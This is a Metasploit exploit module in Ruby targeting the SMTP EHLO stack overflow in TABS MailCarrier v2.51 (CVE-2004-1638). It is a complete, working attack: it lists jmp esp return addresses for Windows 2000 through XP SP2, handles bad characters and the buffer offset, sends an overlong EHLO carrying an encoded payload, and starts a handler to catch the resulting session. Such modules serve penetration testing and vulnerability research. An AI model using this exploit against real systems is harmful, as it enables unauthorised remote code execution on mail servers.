##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'		=> 'TABS MailCarrier v2.51 SMTP EHLO Overflow',
      'Description'	=> %q{
          This module exploits the MailCarrier v2.51 suite SMTP service.
        The stack is overwritten when sending an overly long EHLO command.
      },
      'Author' 	    => [ 'patrick' ],
      'License'       => MSF_LICENSE,
      'References'    =>
      [
        [ 'CVE', '2004-1638' ],
        [ 'OSVDB', '11174' ],
        [ 'BID', '11535' ],
        [ 'EDB', '598' ],
      ],
      'Platform'      => ['win'],
      'Arch'		    => [ ARCH_X86 ],
      'Privileged'		=> true,
      'DefaultOptions'	=>
        {
          'EXITFUNC' 	=> 'thread',
        },
      'Payload' =>
        {
          #'Space'			=> 300,
          'BadChars' 		=> "\x00\x0a\x0d:",
          'StackAdjustment'	=> -3500,
        },
      'Targets' =>
        [
          # Patrick - Tested OK 2007/08/05 : w2ksp0, w2ksp4, xpsp0, xpsp2 en.
          [ 'Windows 2000 SP0 - XP SP1 - EN/FR/GR', { 'Ret' => 0x0fa14c63	} ], # jmp esp expsrv.dll w2ksp0 - xpsp1
          [ 'Windows XP SP2 - EN', 		  { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en
        ],
      'DisclosureDate' => 'Oct 26 2004',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(25),
        Opt::LHOST(), # Required for stack offset
      ])
  end

  def check
    connect
    banner = sock.get_once || ''
    disconnect

    if banner.to_s =~ /ESMTP TABS Mail Server for Windows NT/
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    sploit = "EHLO " + rand_text_alphanumeric(5106 - datastore['LHOST'].length, payload_badchars)
    sploit << [target['Ret']].pack('V') + payload.encoded

    sock.put(sploit + "\r\n")

    handler
    disconnect
  end

end
